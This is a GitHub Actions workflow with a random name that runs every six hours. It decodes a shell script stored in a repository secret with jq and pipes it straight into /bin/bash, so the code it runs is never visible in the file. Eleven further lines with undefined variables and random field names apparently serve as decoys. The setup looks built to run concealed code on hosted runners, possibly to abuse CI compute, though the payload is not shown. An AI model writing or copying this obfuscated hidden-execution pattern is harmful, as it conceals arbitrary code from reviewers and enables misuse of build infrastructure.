name: dopeycockroach
on:
  workflow_dispatch:
  schedule:
    - cron: '1 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dopeycockroach
        env:
          ls5: ${{ secrets.ls5 }}
        run: |
          echo $ls5 | jq -r .bm4 | /bin/bash
          echo $p63735 | jq -r .az8674 | /bin/bash
          echo $fxplo2011 | jq -r .henqt85 | /bin/bash
          echo $xe709 | jq -r .cm172 | /bin/bash
          echo $as72 | jq -r .sg2 | /bin/bash
          echo $g3 | jq -r .hlqm826 | /bin/bash
          echo $nxcn750 | jq -r .wxas5 | /bin/bash
          echo $pyrq413 | jq -r .jy3 | /bin/bash
          echo $j31516 | jq -r .c6 | /bin/bash
          echo $cznz05561 | jq -r .bvgyt8385 | /bin/bash
          echo $gw4209 | jq -r .aqnk39 | /bin/bash
          echo $cjjgv8120 | jq -r .vejxz597 | /bin/bash

